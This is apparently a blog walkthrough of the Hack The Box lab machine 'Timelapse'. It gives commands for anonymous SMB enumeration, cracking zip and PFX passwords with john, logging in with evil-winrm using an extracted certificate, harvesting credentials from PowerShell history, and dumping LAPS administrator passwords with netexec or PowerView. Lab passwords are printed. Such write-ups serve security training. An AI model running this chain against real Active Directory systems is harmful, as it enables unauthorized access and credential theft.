Skip to main content
HTB: Timelapse
  1. Posts/

HTB: Timelapse

·752 words·4 mins
CTF Easy Windows SMB AD
Table of Contents

Introduction
#

Timelapse, an easy-rated Active Directory machine from Hack The Box, starts by finding a key on an SMB share. After cracking it open and authenticate via Evil-WinRM. We’ll find credentials in the PowerShell history file for the next user. That user is a member of LAPS_Readers group, which allows us to pull out local administrator passwords. With that, we’ll get the administrator password and use Evil-WinRM to get a shell.

Recon
#

nmap
#

As always, start with nmap scan:

sudo nmap -sC -sV -p- -v -oA nmap_scan/nmap_results 10.129.116.41

nmap finds 18 open TCP ports:

nmap

The combination of ports (Kerberos + LDAP + DNS + SMB) suggest this should be a domain controller. Plus there is the name on cert on 5986 (dc01.timelapse.htb).

SMB - TCP 445
#

Take a look at SMB, first use netexec or smbclient and find if null session is allowed.

netexec smb 10.129.116.41 --shares -u 'guest' -p ''
smb1

It is and we have 2 readable shares. Next use smbclient to tak a closer look inside

smbclient -N //10.129.116.41/Shares
smb2

There is an interesting file in a Shares share, winrm_backup.zip. Download it and take a look at it on out machine.

smb3

There were few more files in the \helpdesk folder, but there were no use at the end.

Shell as legacyy
#

Exploring winrm_backup
#

The .zip file we downloaded is password protected. We have to get good old john to help there. Use zip2john to get a hash and crack it.

zip2john winrm_backup.zip > ziphash.txt
ziphash
john ziphash.txt --wordlist=~/Tools/rockyou.txt
john1

And we have out first password! supremelegacy

The zip contains single file: legacyy_dev_auth.pfx

legacyy

Extracting certificate and key
#

The .pfx file, which is in a PKCS#12 format, contains the SSL certificate (public keys) and the corresponding private keys. Sometimes, you might have to import the certificate and private keys separately in an unencrypted plain text format to use it on another system. This topic provides instructions on how to convert the .pfx file to .crt and .key files. More here.

When we try to extract … there is a password again, and unfortunatelly not supremelegacy again :)

leg

We have to reach for john again, this time pfx2john

pfx2john legacyy_dev_auth.pfx > pfx_hash
pfx
john pfx_hash --wordlist=~/Tools/rockyou.txt
pfx2

And we get second password thuglegacy

With that we can try to extract cert and key again:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out pfx_key.key
key1

It will require you to input PEM pass phrase, you can put whatever you want there (at least 4 chars)

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx_cert.crt
key2

Logging in
#

We now have everything we need to finally get into the machine.

Use evil-winrm and freshly extracted pfx_key.key and pfx_cert.crt to get in.

  • -S Enable SSL, because its connecting to 5986;
  • -c pfx_cert.crt - provide the public key certificate
  • -k pfx_key.key - provide the private key
  • -i IP - host to connect to
evil-winrm -i 10.129.116.41 -k pfx_key.key -c pfx_cert.crt -S
winrm

And we can get our user flag

uflag

Shell as svc_deploy
#

Looking around
#

As always start with checking privileges and group memberships.

whoami /priv
priv
net user legacyy
user

Nothing too interesting there, maybe the Development group could be useful later..

Powershell History
#

One of the very important places to check is the PS History (More here)

ggg
type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

The file contains few lines, including connecting to the host using the creds for another user, svc_deploy

So we have new set of credentials: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV

sss

Shell
#

With the credential we get in previous step we can use evil-winrm to log in as another user and continue enumeration.

svc

Privilege Escalation
#

Enumeration
#

Logged in as svc_deploy we need to check privileges and group memberships all over again.

svc

And we find something really important! User is member of LAPS_Readers (More here).

This means we can dump passwords for local administrator.

There are 2 ways (that I know from top of my head), either use netexec or PowerView

Dump Admin password
#

Method 1: netexec
#

If there is no access to a powershell you can abuse the LAPS_Readers group privileges remotely through LDAP by using

netexec ldap 10.129.116.41 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps

This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.

ldap

Method 2: PowerView
#

We can upload PowerView.ps1

pw

Import it to PS

pw2

And use Get-ADComputer module to get admin password.

pw3

Log in as admin
#

With the admin credentials we can once again use evil-winrm to log in and grab the root flag.

fff
ddd
Author
~